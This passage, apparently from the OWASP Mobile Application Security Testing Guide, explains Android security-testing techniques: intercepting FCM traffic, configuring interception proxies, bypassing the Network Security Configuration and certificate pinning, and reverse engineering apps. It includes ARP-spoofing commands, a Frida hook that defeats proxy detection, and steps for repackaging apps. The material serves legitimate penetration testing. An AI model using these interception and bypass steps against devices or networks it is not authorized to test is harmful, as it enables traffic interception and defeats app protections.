"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#firebasegoogle-cloud-messaging-fcmgcm","title":"Firebase/Google Cloud Messaging (FCM/GCM)","text":"Firebase Cloud Messaging (FCM), the successor to Google Cloud Messaging (GCM), is a free service offered by Google that allows you to send messages between an application server and client apps. The server and client app communicate via the FCM/GCM connection server, which handles downstream and upstream messages.
Downstream messages (push notifications) are sent from the application server to the client app; upstream messages are sent from the client app to the server.
FCM is available for Android, iOS, and Chrome. FCM currently provides two connection server protocols: HTTP and XMPP. As described in the official documentation, these protocols are implemented differently. The following example demonstrates how to intercept both protocols.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#preparation-of-test-setup","title":"Preparation of Test Setup","text":"You need to either configure iptables on your phone or use bettercap to be able to intercept traffic.
FCM can use either XMPP or HTTP to communicate with the Google backend.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#http","title":"HTTP","text":"FCM uses the ports 5228, 5229, and 5230 for HTTP communication. Usually, only port 5228 is used.
$ echo \"\nrdr pass inet proto tcp from any to any port 5228-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5229 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5230 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For XMPP communication, FCM uses ports 5235 (Production) and 5236 (Testing).
$ echo \"\nrdr pass inet proto tcp from any to any port 5235-> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5236 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#intercepting-the-requests","title":"Intercepting the Requests","text":"The interception proxy must listen to the port specified in the port forwarding rule above (port 8080).
Start the app and trigger a function that uses FCM. You should see HTTP messages in your interception proxy.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#end-to-end-encryption-for-push-notifications","title":"End-to-End Encryption for Push Notifications","text":"As an additional layer of security, push notifications can be encrypted by using Capillary. Capillary is a library to simplify the sending of end-to-end (E2E) encrypted push messages from Java-based application servers to Android clients.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/","title":"Setting Up an Interception Proxy","text":"Several tools support the network analysis of applications that rely on the HTTP(S) protocol. The most important tools are the so-called interception proxies; OWASP ZAP and Burp Suite Professional are the most famous. An interception proxy gives the tester a man-in-the-middle position. This position is useful for reading and/or modifying all app requests and endpoint responses, which are used for testing Authorization, Session Management, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-virtual-device","title":"Interception Proxy for a Virtual Device","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#setting-up-a-web-proxy-on-an-android-virtual-device-avd","title":"Setting Up a Web Proxy on an Android Virtual Device (AVD)","text":"The following procedure, which works on the Android emulator that ships with Android Studio 3.x, is for setting up an HTTP proxy on the emulator:
Configure the HTTP proxy in the emulator settings:
HTTP and HTTPS requests should now be routed over the proxy on the host computer. If not, try toggling airplane mode off and on.
A proxy for an AVD can also be configured on the command line by using the emulator command when starting an AVD. The following example starts the AVD Nexus_5X_API_23 and sets a proxy to 127.0.0.1 and port 8080.
emulator @Nexus_5X_API_23 -http-proxy 127.0.0.1:8080\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#installing-a-ca-certificate-on-the-virtual-device","title":"Installing a CA Certificate on the Virtual Device","text":"An easy way to install a CA certificate is to push the certificate to the device and add it to the certificate store via Security Settings. For example, you can install the PortSwigger (Burp) CA certificate as follows:
cacert.der
by clicking the \"CA Certificate\" button..der
to .cer
.Push the file to the emulator:
adb push cacert.cer /sdcard/\n
Navigate to Settings -> Security -> Install from SD Card.
cacert.cer
.You should then be prompted to confirm installation of the certificate (you'll also be asked to set a device PIN if you haven't already).
This installs the certificate in the user certificate store (tested on Genymotion VM). In order to place the certificate in the root store you can perform the following steps:
adb root
and adb shell
./data/misc/user/0/cacerts-added/
./system/etc/security/cacerts/
.For Android 7.0 (API level 24) and above follow the same procedure described in the \"Bypassing the Network Security Configuration\" section.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-physical-device","title":"Interception Proxy for a Physical Device","text":"The available network setup options must be evaluated first. The mobile device used for testing and the host computer running the interception proxy must be connected to the same Wi-Fi network. Use either an (existing) access point or create an ad-hoc wireless network.
Once you've configured the network and established a connection between the testing host computer and the mobile device, several steps remain.
NET::ERR_CERT_VALIDITY_TOO_LONG
errors, if the leaf certificate happens to have a validity extending a certain time (39 months in case of Chrome). This happens if the default Burp CA certificate is used, since the Burp Suite issues leaf certificates with the same validity as its CA certificate. You can circumvent this by creating your own CA certificate and import it to the Burp Suite, as explained in this blog post.After completing these steps and starting the app, the requests should show up in the interception proxy.
A video of setting up OWASP ZAP with an Android device can be found on secure.force.com.
A few other differences: from Android 8.0 (API level 26) onward, the network behavior of the app changes when HTTPS traffic is tunneled through another connection. And from Android 9 (API level 28) onward, the SSLSocket and SSLEngine will behave a little differently in terms of error handling when something goes wrong during the handshakes.
As mentioned before, starting with Android 7.0 (API level 24), the Android OS will no longer trust user CA certificates by default, unless specified in the application. In the following section, we explain two methods to bypass this Android security control.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bypassing-the-network-security-configuration","title":"Bypassing the Network Security Configuration","text":"In this section we will present several methods to bypass Android's Network Security Configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-custom-user-certificates-to-the-network-security-configuration","title":"Adding Custom User Certificates to the Network Security Configuration","text":"There are different configurations available for the Network Security Configuration to add non-system Certificate Authorities via the src attribute:
<certificates src=[\"system\" | \"user\" | \"raw resource\"]\n overridePins=[\"true\" | \"false\"] />\n
Each certificate can be one of the following:
\"raw resource\"
is an ID pointing to a file containing X.509 certificates\"system\"
for the pre-installed system CA certificates\"user\"
for user-added CA certificatesThe CA certificates trusted by the app can be a system trusted CA as well as a user CA. Usually you will have added the certificate of your interception proxy already as additional CA in Android. Therefore we will focus on the \"user\" setting, which allows you to force the Android app to trust this certificate with the following Network Security Configuration below:
<network-security-config>\n <base-config>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </base-config>\n</network-security-config>\n
To implement this new setting you must follow the steps below:
Decompile the app using a decompilation tool like apktool:
apktool d <filename>.apk\n
Make the application trust user certificates by creating a Network Security Configuration that includes <certificates src=\"user\" />
as explained above
Go into the directory created by apktool when decompiling the app and rebuild the app using apktool. The new apk will be in the dist
directory.
apktool b\n
You need to repackage the app, as explained in the \"Repackaging\" section of the \"Reverse Engineering and Tampering\" chapter. For more details on the repackaging process you can also consult the Android developer documentation, that explains the process as a whole.
Note that even though this method is quite simple, its major drawback is that you have to apply this operation to each application you want to evaluate, which is additional overhead for testing.
Bear in mind that if the app you are testing has additional hardening measures, like verification of the app signature, you might not be able to start the app anymore. As part of the repackaging you will sign the app with your own key, and the resulting signature change will trigger such checks, which might lead to immediate termination of the app. You would need to identify and disable such checks either by patching them during repackaging of the app or by dynamic instrumentation through Frida.
There is a python script available that automates the steps described above called Android-CertKiller. This Python script can extract the APK from an installed Android app, decompile it, make it debuggable, add a new Network Security Configuration that allows user certificates, builds and signs the new APK and installs the new APK with the SSL Bypass.
python main.py -w\n\n***************************************\nAndroid CertKiller (v0.1)\n***************************************\n\nCertKiller Wizard Mode\n---------------------------------\nList of devices attached\n4200dc72f27bc44d device\n\n---------------------------------\n\nEnter Application Package Name: nsc.android.mstg.owasp.org.android_nsc\n\nPackage: /data/app/nsc.android.mstg.owasp.org.android_nsc-1/base.apk\n\nI. Initiating APK extraction from device\n complete\n------------------------------\nI. Decompiling\n complete\n------------------------------\nI. Applying SSL bypass\n complete\n------------------------------\nI. Building New APK\n complete\n------------------------------\nI. Signing APK\n complete\n------------------------------\n\nWould you like to install the APK on your device(y/N): y\n------------------------------------\n Installing Unpinned APK\n------------------------------\nFinished\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-the-proxys-certificate-among-system-trusted-cas-using-magisk","title":"Adding the Proxy's certificate among system trusted CAs using Magisk","text":"In order to avoid the obligation of configuring the Network Security Configuration for each application, we must force the device to accept the proxy's certificate as one of the system's trusted certificates.
There is a Magisk module that will automatically add all user-installed CA certificates to the list of system trusted CAs.
Download the latest version of the module at the Github Release page, push the downloaded file over to the device and import it in the Magisk Manager's \"Module\" view by clicking on the +
button. Finally, a restart is required by Magisk Manager to let changes take effect.
From now on, any CA certificate that is installed by the user via \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Install from storage\" (location may differ) is automatically pushed into the system's trust store by this Magisk module. Reboot and verify that the CA certificate is listed in \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Trusted credentials\" (location may differ).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#manually-adding-the-proxys-certificate-among-system-trusted-cas","title":"Manually adding the Proxy's certificate among system trusted CAs","text":"Alternatively, you can follow the following steps manually in order to achieve the same result:
mount -o rw,remount /system
. If this command fails, try running the following command mount -o rw,remount -t ext4 /system
Prepare the proxy's CA certificates to match system certificates format. Export the proxy's certificates in der
format (this is the default format in Burp Suite) then run the following commands:
$ openssl x509 -inform DER -in cacert.der -out cacert.pem\n$ openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\nmv cacert.pem <hash>.0\n
Finally, copy the <hash>.0
file into the directory /system/etc/security/cacerts and then run the following command:
chmod 644 <hash>.0\n
By following the steps described above you allow any application to trust the proxy's certificate, which allows you to intercept its traffic, unless of course the application uses SSL pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#potential-obstacles","title":"Potential Obstacles","text":"Applications often implement security controls that make it more difficult to perform a security review of the application, such as root detection and certificate pinning. Ideally, you would acquire both a version of the application that has these controls enabled, and one where the controls are disabled. This allows you to analyze the proper implementation of the controls, after which you can continue with the less-secure version for further tests.
Of course, this is not always possible, and you may need to perform a black-box assessment on an application where all security controls are enabled. The section below shows you how you can circumvent certificate pinning for different applications.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#client-isolation-in-wireless-networks","title":"Client Isolation in Wireless Networks","text":"Once you have set up an interception proxy and have a MITM position, you might still not be able to see anything. This might be due to restrictions in the app (see next section) but can also be due to so-called client isolation in the Wi-Fi that you are connected to.
Wireless Client Isolation is a security feature that prevents wireless clients from communicating with one another. This feature is useful for guest and BYOD SSIDs adding a level of security to limit attacks and threats between devices connected to the wireless networks.
What to do if the Wi-Fi we need for testing has client isolation?
You can configure the proxy on your Android device to point to 127.0.0.1:8080, connect your phone via USB to your host computer and use adb to make a reverse port forwarding:
adb reverse tcp:8080 tcp:8080\n
Once you have done this, all proxy traffic on your Android phone will go to port 8080 on 127.0.0.1 and it will be redirected via adb to 127.0.0.1:8080 on your host computer, where you will now see the traffic in Burp. With this trick you are able to test and intercept traffic even in Wi-Fi networks that have client isolation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#non-proxy-aware-apps","title":"Non-Proxy Aware Apps","text":"Once you have set up an interception proxy and have a MITM position, you might still not be able to see anything. This is mainly due to the following reasons:
In both scenarios you would need additional steps to finally be able to see the traffic. In the sections below we describe two different solutions: bettercap and iptables.
You could also use an access point that is under your control to redirect the traffic, but this would require additional hardware and we focus for now on software solutions.
For both solutions you need to activate \"Support invisible proxying\" in Burp, in Proxy Tab/Options/Edit Interface.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#iptables","title":"iptables","text":"You can use iptables on the Android device to redirect all traffic to your interception proxy. The following command would redirect port 80 to your proxy running on port 8080
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination <Your-Proxy-IP>:8080\n
Verify the iptables settings and check the IP and port.
$ iptables -t nat -L\nChain PREROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain INPUT (policy ACCEPT)\ntarget prot opt source destination\n\nChain OUTPUT (policy ACCEPT)\ntarget prot opt source destination\nDNAT tcp -- anywhere anywhere tcp dpt:5288 to:<Your-Proxy-IP>:8080\n\nChain POSTROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain natctrl_nat_POSTROUTING (0 references)\ntarget prot opt source destination\n\nChain oem_nat_pre (0 references)\ntarget prot opt source destination\n
In case you want to reset the iptables configuration you can flush the rules:
iptables -t nat -F\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bettercap","title":"bettercap","text":"Read the chapter \"Testing Network Communication\" and the test case \"Simulating a Man-in-the-Middle Attack\" for further preparation and instructions for running bettercap.
The host computer where you run your proxy and the Android device must be connected to the same wireless network. Start bettercap with the following command, replacing the IP address below (X.X.X.X) with the IP address of your Android device.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#proxy-detection","title":"Proxy Detection","text":"Some mobile apps are trying to detect if a proxy is set. If that's the case they will assume that this is malicious and will not work properly.
In order to bypass such a protection mechanism you could either setup bettercap or configure iptables that don't need a proxy setup on your Android phone. A third option we didn't mention before and that is applicable in this scenario is using Frida. It is possible on Android to detect if a system proxy is set by querying the ProxyInfo
class and check the getHost() and getPort() methods. There might be various other methods to achieve the same task and you would need to decompile the APK in order to identify the actual class and method name.
Below you can find boilerplate source code for a Frida script that will help you to overload the method (in this case called isProxySet) that verifies whether a proxy is set, making it always return false. Even if a proxy is configured, the app will now think that none is set, as the function returns false.
setTimeout(function(){\n Java.perform(function (){\n console.log(\"[*] Script loaded\")\n\n var Proxy = Java.use(\"<package-name>.<class-name>\")\n\n Proxy.isProxySet.overload().implementation = function() {\n console.log(\"[*] isProxySet function invoked\")\n return false\n }\n });\n});\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't help.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypassing-methods","title":"Bypassing Methods","text":"There are several ways to bypass certificate pinning for a black box test, depending on the frameworks available on the device:
android sslpinning disable
command.If you have a rooted device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-rooted device):
android sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for Android for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-statically","title":"Bypass Custom Certificate Pinning Statically","text":"Somewhere in the application, both the endpoint and the certificate (or its hash) must be defined. After decompiling the application, you can search for:
grep -ri \"sha256\\|sha1\" ./smali
. Replace the identified hashes with the hash of your proxy's CA. Alternatively, if the hash is accompanied by a domain name, you can try modifying the domain name to a non-existing domain so that the original domain is not pinned. This works well on obfuscated OkHTTP implementations.find ./assets -type f \\( -iname \\*.cer -o -iname \\*.crt \\)
. Replace these files with your proxy's certificates, making sure they are in the correct format.find ./ -type f \\( -iname \\*.jks -o -iname \\*.bks \\)
. Add your proxy's certificates to the truststore and make sure they are in the correct format.Keep in mind that an app might contain files without extension. The most common file locations are assets
and res
directories, which should also be investigated.
As an example, let's say that you find an application which uses a BKS (BouncyCastle) truststore and it's stored in the file res/raw/truststore.bks
. To bypass SSL Pinning you need to add your proxy's certificate to the truststore with the command line tool keytool
. Keytool
comes with the Java SDK and the following values are needed to execute the command:
To add your proxy's certificate use the following command:
keytool -importcert -v -trustcacerts -file proxy.cer -alias aliascert -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
To list certificates in the BKS truststore use the following command:
keytool -list -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
After making these modifications, repackage the application using apktool and install it on your device.
If the application uses native libraries to implement network communication, further reverse engineering is needed. An example of such an approach can be found in the blog post Identifying the SSL Pinning logic in smali code, patching it, and reassembling the APK
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-dynamically","title":"Bypass Custom Certificate Pinning Dynamically","text":"Bypassing the pinning logic dynamically makes it more convenient as there is no need to bypass any integrity checks and it's much faster to perform trial & error attempts.
Finding the correct method to hook is typically the hardest part and can take quite some time depending on the level of obfuscation. As developers typically reuse existing libraries, it is a good approach to search for strings and license files that identify the used library. Once the library has been identified, examine the non-obfuscated source code to find methods which are suited for dynamic instrumentation.
As an example, let's say that you find an application which uses an obfuscated OkHTTP3 library. The documentation shows that the CertificatePinner.Builder
class is responsible for adding pins for specific domains. If you can modify the arguments to the Builder.add method, you can change the hashes to the correct hashes belonging to your certificate. Finding the correct method can be done in either two ways, as explained in this blog post by Jeroen Beckers:
For the Builder.add method, you can find the possible methods by running the following grep command: grep -ri java/lang/String;\\[Ljava/lang/String;)L ./
This command will search for all methods that take a string and a variable list of strings as arguments, and return a complex object. Depending on the size of the application, this may have one or multiple matches in the code.
Hook each method with Frida and print the arguments. One of them will print out a domain name and a certificate hash, after which you can modify the arguments to circumvent the implemented pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0013/","title":"Reverse Engineering Android Apps","text":"Android's openness makes it a favorable environment for reverse engineers, offering big advantages that are not available with iOS. Because Android is open-source, you can study its source code at the Android Open Source Project (AOSP) and modify the OS and its standard tools any way you want. Even on standard retail devices, it is possible to do things like activating developer mode and sideloading apps without jumping through many hoops. From the powerful tools shipping with the SDK to the wide range of available reverse engineering tools, there's a lot of niceties to make your life easier.
However, there are also a few Android-specific challenges. For example, you'll need to deal with both Java bytecode and native code. Java Native Interface (JNI) is sometimes deliberately used to confuse reverse engineers (to be fair, there are legitimate reasons for using JNI, such as improving performance or supporting legacy code). Developers sometimes use the native layer to \"hide\" data and functionality, and they may structure their apps such that execution frequently jumps between the two layers.
You'll need at least a working knowledge of both the Java-based Android environment and the Linux OS and Kernel, on which Android is based. You'll also need the right toolset to deal with both the bytecode running on the Java virtual machine and the native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/","title":"Static Analysis on Android","text":"Static analysis is a technique used to examine and evaluate the source code of a mobile application without executing it. This method is instrumental in identifying potential security vulnerabilities, coding errors, and compliance issues. Static analysis tools can scan the entire codebase automatically, making them a valuable asset for developers and security auditors.
Two good examples of static analysis tools are grep and semgrep. However, there are many other tools available, and you should choose the one that best fits your needs.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/#example-using-grep-for-manifest-analysis-in-android-apps","title":"Example: Using grep for Manifest Analysis in Android Apps","text":"One simple yet effective use of static analysis is using the grep
command-line tool to inspect the AndroidManifest.xml
file of an Android app. For example, you can extract the minimum SDK version (which indicates the lowest version of Android the app supports) with the following grep
command:
grep 'android:minSdkVersion' AndroidManifest.xml\n
This command searches for the android:minSdkVersion
attribute within the manifest file. Ensuring a higher minSdkVersion
can reduce security risks, as older versions of Android may not include the latest security features and fixes.
semgrep is a more advanced tool that can be used for pattern matching in code. It's particularly useful for identifying complex coding patterns that might lead to security vulnerabilities. For example, to find instances where a deterministic seed is used with the SecureRandom
class (which can compromise the randomness and thus the security), you can use a semgrep rule like:
rules:\n - id: insecure-securerandom-seed\n patterns:\n - pattern: new SecureRandom($SEED)\n - pattern-not: $SEED = null\n message: \"Using a deterministic seed with SecureRandom. Consider using a more secure seed.\"\n languages: [java]\n severity: WARNING\n
This rule will flag any instances in the code where SecureRandom
is initialized with a specific seed, excluding cases where the seed is null (which implies a secure random seed).
TBD
"},{"location":"MASTG/techniques/android/MASTG-TECH-0016/","title":"Disassembling Code to Smali","text":"If you want to inspect the app's smali code (instead of Java), you can open your APK in Android Studio by clicking Profile or debug APK from the \"Welcome screen\" (even if you don't intend to debug it you can take a look at the smali code).
Alternatively you can use apktool to extract and disassemble resources directly from the APK archive and disassemble Java bytecode to smali. apktool allows you to reassemble the package, which is useful for patching the app or applying changes to e.g. the Android Manifest.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0017/","title":"Decompiling Java Code","text":"In Android app security testing, if the application is based solely on Java and doesn't have any native code (C/C++ code), the reverse engineering process is relatively easy and recovers (decompiles) almost all the source code. In those cases, black-box testing (with access to the compiled binary, but not the original source code) can get pretty close to white-box testing.
Nevertheless, if the code has been purposefully obfuscated (or some tool-breaking anti-decompilation tricks have been applied), the reverse engineering process may be very time-consuming and unproductive. This also applies to applications that contain native code. They can still be reverse engineered, but the process is not automated and requires knowledge of low-level details.
If you want to look directly into Java source code on a GUI, simply open your APK using jadx or Bytecode Viewer.
Android decompilers go one step further and attempt to convert Android bytecode back into Java source code, making it more human-readable. Fortunately, Java decompilers generally handle Android bytecode well. The above mentioned tools embed, and sometimes even combine, popular free decompilers such as:
Alternatively you can use the APKLab extension for Visual Studio Code or run apkx on your APK or use the exported files from the previous tools to open the reversed source code on your preferred IDE.
In the following example we'll be using UnCrackable App for Android Level 1. First, let's install the app on a device or emulator and run it to see what the crackme is about.
Seems like we're expected to find some kind of secret code!
We're looking for a secret string stored somewhere inside the app, so the next step is to look inside. First, unzip the APK file (unzip UnCrackable-Level1.apk -d UnCrackable-Level1
) and look at the content. In the standard setup, all the Java bytecode and app data is in the file classes.dex
in the app root directory (UnCrackable-Level1/
). This file conforms to the Dalvik Executable Format (DEX), an Android-specific way of packaging Java programs. Most Java decompilers take plain class files or JARs as input, so you need to convert the classes.dex file into a JAR first. You can do this with dex2jar
or enjarify
.
Once you have a JAR file, you can use any free decompiler to produce Java code. In this example, we'll use the CFR decompiler. CFR releases are available on the author's website. CFR was released under an MIT license, so you can use it freely even though its source code is not available.
The easiest way to run CFR is through apkx, which also packages dex2jar
and automates extraction, conversion, and decompilation. Run it on the APK and you should find the decompiled sources in the directory Uncrackable-Level1/src
. To view the sources, a simple text editor (preferably with syntax highlighting) is fine, but loading the code into a Java IDE makes navigation easier. Let's import the code into IntelliJ, which also provides on-device debugging functionality.
Open IntelliJ and select \"Android\" as the project type in the left tab of the \"New Project\" dialog. Enter \"Uncrackable1\" as the application name and \"vantagepoint.sg\" as the company name. This results in the package name \"sg.vantagepoint.uncrackable1\", which matches the original package name. Using a matching package name is important if you want to attach the debugger to the running app later on because IntelliJ uses the package name to identify the correct process.
In the next dialog, pick any API number; you don't actually want to compile the project, so the number doesn't matter. Click \"next\" and choose \"Add no Activity\", then click \"finish\".
Once you have created the project, expand the \"1: Project\" view on the left and navigate to the folder app/src/main/java
. Right-click and delete the default package \"sg.vantagepoint.uncrackable1\" created by IntelliJ.
Now, open the Uncrackable-Level1/src
directory in a file browser and drag the sg
directory into the now empty Java
folder in the IntelliJ project view (hold the \"alt\" key to copy the folder instead of moving it).
You'll end up with a structure that resembles the original Android Studio project from which the app was built.
See the section \"Reviewing Decompiled Java Code\" below to learn how to proceed when inspecting the decompiled Java code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/","title":"Disassembling Native Code","text":"Dalvik and ART both support the Java Native Interface (JNI), which defines a way for Java code to interact with native code written in C/C++. As on other Linux-based operating systems, native code is packaged (compiled) into ELF dynamic libraries (*.so), which the Android app loads at runtime via the System.load
method. However, instead of relying on widely used C libraries (such as glibc), Android binaries are built against a custom libc named Bionic. Bionic adds support for important Android-specific services such as system properties and logging, and it is not fully POSIX-compatible.
When reversing an Android application containing native code, we need to understand a couple of data structures related to the JNI bridge between Java and native code. From the reversing perspective, we need to be aware of two key data structures: JavaVM
and JNIEnv
. Both of them are pointers to pointers to function tables:
JavaVM
provides an interface to invoke functions for creating and destroying a JavaVM. Android allows only one JavaVM
per process and is not really relevant for our reversing purposes.JNIEnv
provides access to most of the JNI functions which are accessible at a fixed offset through the JNIEnv
pointer. This JNIEnv
pointer is the first parameter passed to every JNI function. We will discuss this concept again with the help of an example later in this chapter.It is worth highlighting that analyzing disassembled native code is much more challenging than disassembled Java code. When reversing the native code in an Android application we will need a disassembler.
In the next example we'll reverse the HelloWorld-JNI.apk from the OWASP MASTG repository. Installing and running it in an emulator or Android device is optional.
wget https://github.com/OWASP/owasp-mastg/raw/master/Samples/Android/01_HelloWorld-JNI/HelloWord-JNI.apk\n
This app is not exactly spectacular, all it does is show a label with the text \"Hello from C++\". This is the app Android generates by default when you create a new project with C/C++ support, which is just enough to show the basic principles of JNI calls.
Decompile the APK with apkx
.
$ apkx HelloWord-JNI.apk\nExtracting HelloWord-JNI.apk to HelloWord-JNI\nConverting: classes.dex -> classes.jar (dex2jar)\ndex2jar HelloWord-JNI/classes.dex -> HelloWord-JNI/classes.jar\nDecompiling to HelloWord-JNI/src (cfr)\n
This extracts the source code into the HelloWord-JNI/src
directory. The main activity is found in the file HelloWord-JNI/src/sg/vantagepoint/helloworldjni/MainActivity.java
. The \"Hello World\" text view is populated in the onCreate
method:
public class MainActivity\nextends AppCompatActivity {\n static {\n System.loadLibrary(\"native-lib\");\n }\n\n @Override\n protected void onCreate(Bundle bundle) {\n super.onCreate(bundle);\n this.setContentView(2130968603);\n ((TextView)this.findViewById(2131427422)).setText((CharSequence)this. \\\n stringFromJNI());\n }\n\n public native String stringFromJNI();\n}\n
Note the declaration of public native String stringFromJNI
at the bottom. The keyword \"native\" tells the Java compiler that this method is implemented in a native language. The corresponding function is resolved during runtime, but only if a native library that exports a global symbol with the expected signature is loaded (signatures comprise a package name, class name, and method name). In this example, this requirement is satisfied by the following C or C++ function:
JNIEXPORT jstring JNICALL Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI(JNIEnv *env, jobject)\n
So where is the native implementation of this function? If you look into the \"lib\" directory of the unzipped APK archive, you'll see several subdirectories (one per supported processor architecture), each of them containing a version of the native library, in this case libnative-lib.so
. When System.loadLibrary
is called, the loader selects the correct version based on the device that the app is running on. Before moving ahead, pay attention to the first parameter passed to the current JNI function. It is the same JNIEnv
data structure which was discussed earlier in this section.
Following the naming convention mentioned above, you can expect the library to export a symbol called Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI
. On Linux systems, you can retrieve the list of symbols with readelf
(included in GNU binutils) or nm
. Do this on macOS with the greadelf
tool, which you can install via Macports or Homebrew. The following example uses greadelf
:
$ greadelf -W -s libnative-lib.so | grep Java\n 3: 00004e49 112 FUNC GLOBAL DEFAULT 11 Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI\n
You can also see this using radare2's rabin2:
$ rabin2 -s HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so | grep -i Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
This is the native function that eventually gets executed when the stringFromJNI
native method is called.
To disassemble the code, you can load libnative-lib.so
into any disassembler that understands ELF binaries (i.e., any disassembler). If the app ships with binaries for different architectures, you can theoretically pick the architecture you're most familiar with, as long as it is compatible with the disassembler. Each version is compiled from the same source and implements the same functionality. However, if you're planning to debug the library on a live device later, it's usually wise to pick an ARM build.
To support both older and newer ARM processors, Android apps ship with multiple ARM builds compiled for different Application Binary Interface (ABI) versions. The ABI defines how the application's machine code is supposed to interact with the system at runtime. The following ABIs are supported:
Most disassemblers can handle any of those architectures. Below, we'll be viewing the armeabi-v7a version (located in HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
) in radare2 and in IDA Pro. See the section \"Reviewing Disassembled Native Code\" below to learn how to proceed when inspecting the disassembled native code.
To open the file in radare2 you only have to run r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
. The chapter \"Android Basic Security Testing\" already introduced radare2. Remember that you can use the flag -A
to run the aaa
command right after loading the binary in order to analyze all referenced code.
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x00001dcf (aav)\n[x] 0x00000000-0x00001dcf in 0x0-0x1dcf (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n -- Print the contents of the current block with the 'p' command\n[0x00000e3c]>\n
Note that for bigger binaries, starting directly with the flag -A
might be very time consuming as well as unnecessary. Depending on your purpose, you may open the binary without this option and then apply a less complex analysis like aa
or a more concrete type of analysis such as the ones offered in aa
(basic analysis of all functions) or aac
(analyze function calls). Remember to always type ?
to get the help or attach it to commands to see even more command or options. For example, if you enter aa?
you'll get the full list of analysis commands.
